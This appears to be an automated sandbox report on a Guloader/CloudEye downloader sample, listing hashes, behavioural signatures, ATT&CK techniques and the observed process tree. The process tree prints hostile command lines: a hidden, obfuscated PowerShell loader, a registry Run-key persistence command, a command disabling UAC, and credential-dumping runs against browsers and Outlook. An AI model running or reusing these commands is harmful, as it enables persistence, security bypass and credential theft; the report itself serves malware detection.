Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
04/09/2024, 01:21
General
-
Target
f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7.exe
-
Size
915KB
-
MD5
68201a6f398b098b4994a9e5f2d4405c
-
SHA1
5a39054a39b347e9d294bc42927861692bc03b6b
-
SHA256
f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7
-
SHA512
5fc21c049f18297d1d27857dd433a5df77d1bcbc8ecf7ab796ad91443f406355e70159759e519fee313b136ca63179fe2b81fd2f7cdb47868ce5ef9743db6da8
-
SSDEEP
12288:DBfOreqgPSOONGdVAhCssylYH+ZQnBPmQ8HjWsgrqpqfyl0fGXJ9BqNJowksV3:hOreq0OMAxsyuHdUHjvEO0fG5vq7Hx
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
UAC bypass 3 TTPs 1 IoCs
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 7 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 29 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7.exe"C:\Users\Admin\AppData\Local\Temp\f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Showpiece44=Get-Content 'C:\Users\Admin\AppData\Local\twinsomeness\Duperingernes.ing';$Subfluid=$Showpiece44.SubString(24464,3);.$Subfluid($Showpiece44)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe"C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe"3⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "kingrow" /t REG_EXPAND_SZ /d "%Dfa% -windowstyle minimized $Celebrer=(Get-ItemProperty -Path 'HKCU:\Overvre\').Fljtets;%Dfa% ($Celebrer)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "kingrow" /t REG_EXPAND_SZ /d "%Dfa% -windowstyle minimized $Celebrer=(Get-ItemProperty -Path 'HKCU:\Overvre\').Fljtets;%Dfa% ($Celebrer)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exeC:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe /stext "C:\Users\Admin\AppData\Local\Temp\hredxpy"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exeC:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe /stext "C:\Users\Admin\AppData\Local\Temp\jljoyhjakz"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exeC:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe /stext "C:\Users\Admin\AppData\Local\Temp\unxhzaucyhzrw"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5805b5618beac670ec39d84ed3f03b270
SHA1ffdbb55747b8249318312893dcad3d62157698a7
SHA2561357507bf0a17dbdce3efa60599e82499edd0e729fa9b3ef62560d1728dce68e
SHA51239deaae8cf34443a05e7ca18d74a327eac41aa8a8cdd2538521e66adf416b5ab90373f670fe3a74e358f990d16799cf02c7154b6cd5b323c794a46df2c385e75
-
Filesize
915KB
MD568201a6f398b098b4994a9e5f2d4405c
SHA15a39054a39b347e9d294bc42927861692bc03b6b
SHA256f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7
SHA5125fc21c049f18297d1d27857dd433a5df77d1bcbc8ecf7ab796ad91443f406355e70159759e519fee313b136ca63179fe2b81fd2f7cdb47868ce5ef9743db6da8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5c7ac5a21cac5bd5580a6e28112212613
SHA10a256177c387053fec680e599bcb63729a16c161
SHA25689e0e7dc8ad418f8613610b71d0c140247e26a5f9a453ee255b1467fb80f15ff
SHA512753675a75b643132e50175d67589a3952cb5154a7e51c11883b2e28bf4fe406afbaed88e61575cc114156e41ed5c587b0f76845e6d20ddf922e775bfff3f0b43
-
Filesize
67KB
MD5f9a33a09287d7157286f38877c443dea
SHA1b4be7206cf4a5de226c3595bea2d4c2d0cbe1ecc
SHA2562b2f4b4baea1491aa69ec9829bb56f92f0d0525aed11a1a117c9942d1e70e0d2
SHA512b3b522b563a2118ae4ab914d63ddc30ef83035ea33642abfcc28b5544167b82124c60feb61fd98186cc3387cab88151a587e85dc894e8a824d9fa7a7bb743252
-
Filesize
357KB
MD58315fece2c735c00d3bbbeebbe094958
SHA128a1732cebbdfff364474622f954c5ae30067bc3
SHA2563ab4200bc1e7592168a8eab5ad57af8b98dfb538b5934e8ffd0673531ab2b481
SHA512e0e837e888a6e40c8339fdec8a18dc29ecefadaeef9880b651f3570fa668596cebd3951ba1b14aba6c4cdfa0ce5c2c01dd50cea95911fd5d3ff1eb416d39117c
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
6.5MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
89.2MB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
89.2MB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB